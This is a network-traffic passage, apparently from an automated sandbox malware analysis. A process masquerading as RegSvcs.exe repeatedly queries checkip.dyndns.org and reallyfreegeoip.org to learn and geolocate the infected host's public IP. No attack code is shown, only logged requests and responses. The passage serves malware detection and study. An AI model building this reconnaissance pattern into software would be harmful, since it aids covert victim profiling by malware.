Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 19:10:46.520664930 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:10:46.852461100 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:46 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49719 | 193.122.6.168 | 80 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:10:47.489238977 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:10:49.170382023 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:49 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49736 | 193.122.6.168 | 80 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:10:49.792860031 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:10:50.442044020 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:50 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49748 | 193.122.6.168 | 80 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:10:51.097515106 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:10:52.732923031 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:52 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49766 | 193.122.6.168 | 80 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:10:53.577761889 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:10:54.225126028 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:54 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49778 | 193.122.6.168 | 80 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:10:54.864471912 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:10:56.503776073 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:56 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49795 | 193.122.6.168 | 80 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:10:57.127774000 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:10:57.765115023 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:57 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49807 | 193.122.6.168 | 80 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:10:58.408020973 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:10:59.036676884 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:10:58 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49820 | 193.122.6.168 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:11:00.572510004 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:11:01.197823048 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:01 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 19:11:01.202238083 CET | 127 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:11:01.407902002 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:01 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 19:11:02.080760956 CET | 127 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:11:02.265723944 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:02 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49838 | 193.122.6.168 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:11:02.901779890 CET | 127 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 19:11:03.531225920 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:03 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49850 | 193.122.6.168 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:11:04.135421038 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:11:04.770710945 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:04 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49858 | 193.122.6.168 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:11:05.423007011 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:11:06.068742037 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:05 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49870 | 193.122.6.168 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:11:06.687894106 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:11:07.314578056 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:07 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49882 | 193.122.6.168 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:11:07.938612938 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:11:08.594248056 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:08 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49890 | 193.122.6.168 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:11:09.236655951 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:11:09.883912086 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:09 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49902 | 193.122.6.168 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:11:10.518908024 CET | 151 bytes | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 19:11:11.147424936 CET | 273 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 18:11:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49712 | 104.21.16.144 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:46 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:10:46 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:46 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847435
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=467XfSZ95bge7lIXK2%2FUY0B5s0iFLx31Kw5aq%2Fj1g75LVl47V%2FQZaVcOUglFfyo9qRDQBSKZHnMFHdiBwNLvQhLh5DILqx%2FVsyxn8roFCiA5uEinunPbXeg1H1BUOP3QluOFzRk4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0303e057293-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1933&min_rtt=1923&rtt_var=741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1456359&cwnd=158&unsent_bytes=0&cid=2f49649b26c92966&ts=228&x=0"
2025-01-10 18:10:46 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49718 | 104.21.16.144 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:47 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:10:47 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:47 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847436
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z24IA%2FKrrivBcBEEn3sWlAfXKO0nqgWR3dwF7ggDxdTQWLRv45VLbl5FDwRt4XCl67mmo%2F6YGjzaBsPho1z7%2FP5mmiRLG12lxKRvOanOt%2BjpBiqvQPjoc12ovdg1O56tUvx5Vc8v"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea03659c60fa8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1492&rtt_var=1481&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=563815&cwnd=252&unsent_bytes=0&cid=862aa72a82860a8d&ts=158&x=0"
2025-01-10 18:10:47 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49735 | 104.21.16.144 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:49 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:10:49 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:49 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847438
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5Q1CWvOx1duf5X23HNUGx9j5YXIJJ5a4N%2BZVIGMxcxU%2B1q9GfBq1re%2F6%2BMRN%2BPCfVIfHsdeHwXuSIzz0LuCkEOQiT2Ti9nIFUKaZfVrZvNTw%2BevcwS5vHG5wchGYzo8Jnhkt7ze"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea044cf0e4388-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1633&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1788120&cwnd=221&unsent_bytes=0&cid=001137a0406e377d&ts=142&x=0"
2025-01-10 18:10:49 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49742 | 104.21.16.144 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:50 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:10:51 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:51 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847440
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23ljxE2Gdhs%2BsSPhpPIGWAGoyV0QlYgXym%2F6cPr%2BHto2aw00%2Bdz3kJaDAVEk5CQGKjDITUl3qGhJy7DM58H42xQltJKBkU6%2BVtr7ktzsWQOGviAy9mbiTTgGi%2F0uPxvkWDvRAl0X"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea04ccca28ce3-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1811&rtt_var=711&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1612368&cwnd=252&unsent_bytes=0&cid=b66a75cdb8574de7&ts=165&x=0"
2025-01-10 18:10:51 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49760 | 104.21.16.144 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:53 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:10:53 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:53 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847442
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCHfpLUv78VPInbhL0w4%2B%2Bpkytpdr5D6sVrXOL8CT%2FZK3bBVKr%2B%2BwzIp37z4J2LEVLFYECgoCy7YPoGI8wVMenHqueczN9jI%2FgxBdIdtQ1QtX8tNpmllvHLrHd45LyZDoqGfPd6m"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea05b2d8c1899-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1657&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1718658&cwnd=153&unsent_bytes=0&cid=9767bfbefee8c7fb&ts=164&x=0"
2025-01-10 18:10:53 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49772 | 104.21.16.144 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:54 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 18:10:54 UTC | 859 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:54 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847443
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dekc1%2BL3SNSkH4zafrbHtsYmKmoqVj3WvreZX3oefXRL6udyYQJdQFgdg8Rnt%2FsaPaewWGrDYczv2ZzeZroKM%2FCSSNP7lq%2FE19UAo4keKbPS8a6boz%2FbBwqJ6h7qWprSvTTfWY4L"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffea0646d8441ba-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1650&rtt_var=658&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615044&cwnd=192&unsent_bytes=0&cid=e23b7117795eb82c&ts=163&x=0"
2025-01-10 18:10:54 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49788 | 104.21.16.144 | 443 | 6108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 18:10:56 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 18:10:57 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 18:10:57 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1847446
